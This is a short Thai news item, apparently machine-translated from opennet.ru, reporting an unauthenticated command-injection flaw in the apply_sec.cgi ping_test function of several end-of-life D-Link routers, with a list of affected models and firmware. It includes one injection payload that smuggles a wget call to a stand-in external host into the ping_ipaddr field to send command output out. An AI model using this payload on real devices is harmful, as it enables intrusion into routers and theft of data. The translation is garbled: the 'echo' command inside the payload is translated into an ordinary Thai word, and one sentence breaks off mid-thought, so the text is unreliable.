ในเราเตอร์ไร้สาย D-Link
ที่น่าสนใจตามที่นักพัฒนาเฟิร์มแวร์ระบุว่าการเรียก "ping_test" ควรดำเนินการหลังจากการตรวจสอบสิทธิ์เท่านั้น แต่ในความเป็นจริงแล้วจะมีการเรียกไม่ว่าในกรณีใด ๆ โดยไม่คำนึงถึงการเข้าสู่เว็บอินเตอร์เฟส โดยเฉพาะอย่างยิ่งเมื่อเข้าถึงสคริปต์ Apply_sec.cgi และส่งพารามิเตอร์ "action=ping_test" สคริปต์จะเปลี่ยนเส้นทางไปยังหน้าการตรวจสอบสิทธิ์ แต่ในขณะเดียวกันก็ดำเนินการที่เกี่ยวข้องกับ ping_test ในการรันโค้ด มีการใช้ช่องโหว่อื่นใน ping_test เอง ซึ่งเรียกใช้ยูทิลิตี้ ping โดยไม่ตรวจสอบความถูกต้องของที่อยู่ IP ที่ส่งไปทดสอบอย่างถูกต้อง ตัวอย่างเช่น หากต้องการเรียกใช้ยูทิลิตี้ wget และถ่ายโอนผลลัพธ์ของคำสั่ง “echo 1234” ไปยังโฮสต์ภายนอก เพียงระบุพารามิเตอร์ “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( เสียงสะท้อน 1234)"
การมีอยู่ของช่องโหว่ได้รับการยืนยันอย่างเป็นทางการในรูปแบบต่อไปนี้:
- DIR-655 พร้อมเฟิร์มแวร์ 3.02b05 หรือเก่ากว่า
- DIR-866L พร้อมเฟิร์มแวร์ 1.03b04 หรือเก่ากว่า
- DIR-1565 พร้อมเฟิร์มแวร์ 1.01 หรือเก่ากว่า
- DIR-652 (ไม่มีข้อมูลเกี่ยวกับเวอร์ชันเฟิร์มแวร์ที่มีปัญหา)
ระยะเวลาการสนับสนุนสำหรับรุ่นเหล่านี้หมดลงแล้ว ดังนั้น D-Link
ต่อมาได้มีการค้นพบช่องโหว่ดังกล่าวอีกด้วย
ที่มา: opennet.ru